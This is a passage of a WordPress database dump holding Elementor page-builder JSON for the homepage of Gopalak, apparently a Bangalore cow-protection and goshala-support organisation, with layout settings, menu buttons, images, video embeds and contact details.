us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1579,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\"},{\"id\":1567,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\"},{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9855,1655,'_elementor_page_assets','a:0:{}'),(9857,1656,'_elementor_edit_mode','builder'),(9858,1656,'_elementor_template_type','wp-page'),(9859,1656,'_elementor_version','3.7.8'),(9860,1656,'_wp_page_template','elementor_canvas'),(9861,1656,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1579,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\"},{\"id\":1567,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\"},{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus 